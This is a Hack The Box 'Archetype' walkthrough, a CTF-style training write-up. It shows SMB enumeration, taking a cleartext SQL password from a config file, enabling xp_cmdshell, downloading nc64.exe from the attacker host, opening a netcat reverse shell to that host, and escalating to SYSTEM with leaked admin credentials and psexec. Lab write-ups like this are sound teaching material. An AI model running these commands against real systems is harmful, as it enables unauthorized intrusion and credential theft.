---
sidebar_position: 1
sidebar_label: 🌶 Archetype
description: ''
last_update:
  date: 2022/06/12
  author: Raúl Sánchez
tags:
  - smbclient
  - Impacket
  - mssqlclient.py
  - psexec.py
  - xp_cmdshell
  - nc64.exe
  - netcat
  - winPEAS
keywords: 
  - Hack The Box
  - HTB
  - HTB Writeups
  - Hacking
  - HTB Walkthrough
  - Write-up
  - Walkthrough
---

# Archetype

> This is the first Tier 2 Machine of the Starting Point. Here we will see how to make a reverse shell with a script.

## 0. Start the machine

To start machine, Just click "Spawn Machine".

![Spawn Archetype machine.](archetype1.png)

Then you can see the **IP** address for that machine. In this case the machine has the IP `10.129.23.254`. Before going to enumeration steps we can simply ping to the IP address and check our **VPN** connection and whether machine is alive. Sometimes machines might "Disable" ping requests from passing through the firewall. But in most case ping will be a success!

```python
❯ ping -c1 10.129.23.254
PING 10.129.23.254 (10.129.23.254) 56(84) bytes of data.
64 bytes from 10.129.23.254: icmp_seq=1 ttl=127 time=53.5 ms

--- 10.129.23.254 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 53.481/53.481/53.481/0.000 ms
```

:::caution Disclaimer
No flags (user/root) are shown in this **writeup**, so follow the procedures to grab the flags! Enjoy! 👽️
:::

## 1. Enumeration

The first thing to do is to identify which operating system you are using. We will use the [whichSystem.py](https://github.com/RaulSanchezzt/kali-bspmw/blob/master/tools/whichSystem.py) tool to find out.

```python
❯ whichSystem.py 10.129.23.254

10.129.23.254 (ttl -> 127): Windows
```

:::info
By default Linux has a TTL of 64 and Windows has 128.
:::

### 1.1 Nmap

Then, we will use the [nmap](https://nmap.org/) tool with the following parameters:

* [-sV](https://nmap.org/book/man-version-detection.html) : to see the services and their version.
* \-sC : performs a script scan using the default set of scripts.

```python
❯ nmap -sV -sC 10.129.23.254
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-12 14:28 CEST
Nmap scan report for 10.129.23.254
Host is up (0.056s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT     STATE SERVICE      VERSION
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
1433/tcp open  ms-sql-s     Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-ntlm-info: 
|   Target_Name: ARCHETYPE
|   NetBIOS_Domain_Name: ARCHETYPE
|   NetBIOS_Computer_Name: ARCHETYPE
|   DNS_Domain_Name: Archetype
|   DNS_Computer_Name: Archetype
|_  Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2022-06-12T12:25:23
|_Not valid after:  2052-06-12T12:25:23
|_ssl-date: 2022-06-12T12:28:52+00:00; 0s from scanner time.
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2022-06-12T12:28:45
|_  start_date: N/A
| smb-os-discovery: 
|   OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
|   Computer name: Archetype
|   NetBIOS computer name: ARCHETYPE\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2022-06-12T05:28:42-07:00
| ms-sql-info: 
|   10.129.23.254:1433: 
|     Version: 
|       name: Microsoft SQL Server 2017 RTM
|       number: 14.00.1000.00
|       Product: Microsoft SQL Server 2017
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
|_clock-skew: mean: 1h24m00s, deviation: 3h07m50s, median: 0s
```

As we see, there are four open ports. Microsoft Windows [RPC](https://docs.microsoft.com/en-us/windows/win32/rpc/rpc-start-page) is running on 135/tcp, Microsoft Windows [netbios-ssn](https://www.lifewire.com/netbios-software-protocol-818229) on 139/tcp, [SMB](https://docs.microsoft.com/en-us/windows/win32/fileio/microsoft-smb-protocol-and-cifs-protocol-overview) on 445/tcp and finally Microsoft [SQL](https://www.microsoft.com/en-us/sql-server/sql-server-2017) Server 2017 on 1433/tcp.    &#x20;

:::note
**Microsoft Remote Procedure Call** (RPC) defines a powerful technology for creating distributed client/server programs.

**NetBIOS** provides communication services on local networks. It uses a software protocol called NetBIOS Frames that allows applications and computers on a local area network to communicate with network hardware and to transmit data across the network.

The **Server Message Block** (SMB) Protocol is a network file sharing protocol, and as implemented in Microsoft Windows is known as Microsoft SMB Protocol.
:::

### 1.2 SmbClient

We are going to enumerate the SMB with the tool `smbclient`. Using `-N` to don't use a password and `-L` to list all the shares.

```python
❯ smbclient -N -L 10.129.23.254

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	backups         Disk      
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
Reconnecting with SMB1 for workgroup listing.
```

Shares with the character **`$`** cannot be accessed because we don't have `admin` permissions, however, we can try to access and enumerate the backups share by using the following command:

```python
❯ smbclient -N \\\\10.129.23.254\\backups
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Mon Jan 20 13:20:57 2020
  ..                                  D        0  Mon Jan 20 13:20:57 2020
  prod.dtsConfig                     AR      609  Mon Jan 20 13:23:02 2020

		5056511 blocks of size 4096. 2540596 blocks available
smb: \> get prod.dtsConfig 
getting file \prod.dtsConfig of size 609 as prod.dtsConfig (2,4 KiloBytes/sec) (average 2,4 KiloBytes/sec)
smb: \> quit
```

Then, we have downloaded the file with the `get` command. In the file we see in cleartext the password of the user `sql_svc` , which is `M3g4c0rp123` , for the host `ARCHETYPE.`

```python
❯ cat prod.dtsConfig
───────┬────────────────────────────────────────────────────────────────────────────────────────
       │ File: prod.dtsConfig
       │ Size: 609 B
───────┼────────────────────────────────────────────────────────────────────────────────────────
   1   │ <DTSConfiguration>
   2   │     <DTSConfigurationHeading>
   3   │         <DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." Gene
       │ ratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
   4   │     </DTSConfigurationHeading>
   5   │     <Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Pr
       │ operties[ConnectionString]" ValueType="String">
   6   │         <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;I
       │ nitial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=F
       │ alse;</ConfiguredValue>
   7   │     </Configuration>
   8   │ </DTSConfiguration>
───────┴────────────────────────────────────────────────────────────────────────────────────────
```

## 2. Foothold

### 2.1 Impacket

Now we just need a way to connect and authenticate to the MSSQL server. In this case we are going to use a [Impacket](https://github.com/SecureAuthCorp/impacket) tool called mssqlclient.py which offers such a functionality. You can install following this steps.

```bash
git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
pip3 install .
# OR:
sudo python3 setup.py install
# In case you are missing some modules:
pip3 install -r requirements.txt
```

Then, we can try to connect to the `MSSQL` server by issuing the following command:

```bash
❯ cd examples
❯ python3 mssqlclient.py ARCHETYPE/sql_svc@10.129.23.254 -windows-auth
Impacket v0.10.1.dev1+20220606.123812.ac35841f - Copyright 2022 SecureAuth Corporation

Password: // M3g4c0rp123
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(ARCHETYPE): Line 1: Changed database context to 'master'.
[*] INFO(ARCHETYPE): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232) 
[!] Press help for extra shell commands
SQL> 
```

Here's a great [article](https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server) that can guide us further to our exploration journey with `MSSQL Server`:

Now we're in, so we need to check what is the role we have in the server. We will use the command found in the above article.

```sql
SQL> SELECT is_srvrolemember('sysadmin');
              

-----------   

          1 
```

The output is `1` , which translates to `True` .&#x20;

### 2.2 xp\_cmdshell

First of all check if the `xp_cmdshell` is already activated.

```sql
SQL> EXEC xp_cmdshell 'net user';
[-] ERROR(ARCHETYPE): Line 1: SQL Server blocked access to procedure 
'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is 
turned off as part of the security configuration for this server. 
A system administrator can enable the use of 'xp_cmdshell' by using 
sp_configure. For more information about enabling 'xp_cmdshell', 
search for 'xp_cmdshell' in SQL Server Books Online.
```

As we see, is not activated. For this reason we will need to proceed with the activation of `xp_cmdshell` as follows:

```sql
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
sp_configure;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
```

Now we are able to execute system commands:

```sql
SQL> xp_cmdshell "whoami"
output                                                                             

--------------------------------------------------------------------------------   

archetype\sql_svc                                                                  

NULL 
```

Finally we managed to get a command execution!

### 2.3 Reverse Shell

Now we will try to upload the `nc64.exe` binary to the target machine and execute an interactive `cmd.exe` process on our listening port. Download [nc64.exe](https://github.com/int0x33/nc.exe/blob/master/nc64.exe?source=post\_page-----a2ddc3557403----------------------) and start a simple HTTP server in that folder.

```python
❯ sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
```

Then start a `netcat` listener in a different tab by using the following commands:

```python
❯ sudo rlwrap nc -nlvp 443
listening on [any] 443 ...
```

Make sure you have a rule that allows connections to the ports 80 and 443 to follow.

```python
❯ sudo ufw allow from 10.129.23.254 proto tcp to any port 80,443
```

After that, we need to change the current working directory somewhere in the home directory of our user where it will be possible to write. In order to do that, we are going to use the `wget` tool within `PowerShell.`

```sql
SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://10.10.15.241/nc64.exe -outfile nc64.exe"
output                                                                             

--------------------------------------------------------------------------------   

NULL
```

We can verify on our simple Python `HTTP` server that the target machine indeed performed the request.

```python
❯ sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

10.129.23.254 - - [12/Jun/2022 16:23:07] "GET /nc64.exe HTTP/1.1" 200 -
```

Now, we can bind the `cmd.exe` through the `nc` to our listener:

```sql
SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc64.exe -e cmd.exe 10.10.15.241 443"
```

Finally looking back at our `netcat` listener we can confirm our reverse shell and our foothold to the system.

```python
connect to [10.10.15.241] from (UNKNOWN) [10.129.23.254] 49679
Microsoft Windows [Version 10.0.17763.2061]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\sql_svc\Downloads> whoami
archetype\sql_svc
```

The user `flag` can be found in the user's Desktop.

```basic
cd C:\Users\sql_svc\Desktop
cd C:\Users\sql_svc\Desktop

dir
 Volume in drive C has no label.
 Volume Serial Number is 9565-0B4F

 Directory of C:\Users\sql_svc\Desktop

01/20/2020  06:42 AM    <DIR>          .
01/20/2020  06:42 AM    <DIR>          ..
02/25/2020  07:37 AM                32 user.txt
               1 File(s)             32 bytes
               2 Dir(s)  10,713,382,912 bytes free

type user.txt
```

### 2.4 winPEAS

Finally, we are going to use a tool called [`winPEAS`](https://github.com/carlospolop/PEASS-ng/releases/download/refs%2Fpull%2F260%2Fmerge/winPEASx64.exe) , download the tool and transfer it to our target system by using once more the Python HTTP server.

```python
❯ sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
```

On the target machine, we will execute the `wget` command in order to download the program from our system. We will use `powershell` for all our commands.

```powershell
powershell
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.
wget http://10.10.15.241/winPEASx64.exe -outfile winPEASx64.exe
ls
    Directory: C:\Users\sql_svc\Downloads


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----        6/12/2022   7:24 AM          45272 nc64.exe                                            
-a----        6/12/2022   7:36 AM        1930752 winPEASx64.exe
```

We successfully downloaded the binary. To execute it, we will do the following.

```python
.\winPEASx64.exe
// output of the tool is long
```

We can first check the two existing files where credentials could be possible to be found. We will read the `PowerShell` history file, which is the equivalent of `.bash_history` or `zsh_history` for Linux systems.

```powershell
PS C:\Users\sql_svc\Downloads>
    cd C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\
dir

Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-ar---        3/17/2020   2:36 AM             79 ConsoleHost_history.txt                                               


                                                                 
type ConsoleHost_history.txt
net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!
exit
```

We got in clear text the password for the Administrator user. Use the tool `psexec.py` again from the `Impacket` suite to get a shell as the administrator.

```python
❯ python3 psexec.py administrator@10.129.23.254
Impacket v0.10.1.dev1+20220606.123812.ac35841f - Copyright 2022 SecureAuth Corporation

Password:
[*] Requesting shares on 10.129.23.254.....
[*] Found writable share ADMIN$
[*] Uploading file JufBehcI.exe
[*] Opening SVCManager on 10.129.23.254.....
[*] Creating service ciPA on 10.129.23.254.....
[*] Starting service ciPA.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.2061]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system
```

The `root` flag can now be found in the Desktop of the Administrator user.

```batch
C:\Windows\system32> cd C:\Users\Administrator\Desktop

C:\Users\Administrator\Desktop> dir
 Volume in drive C has no label.
 Volume Serial Number is 9565-0B4F

 Directory of C:\Users\Administrator\Desktop

07/27/2021  02:30 AM    <DIR>          .
07/27/2021  02:30 AM    <DIR>          ..
02/25/2020  07:36 AM                32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)  10,707,492,864 bytes free

C:\Users\Administrator\Desktop> type root.txt
```

Wow! we managed to get both flags.
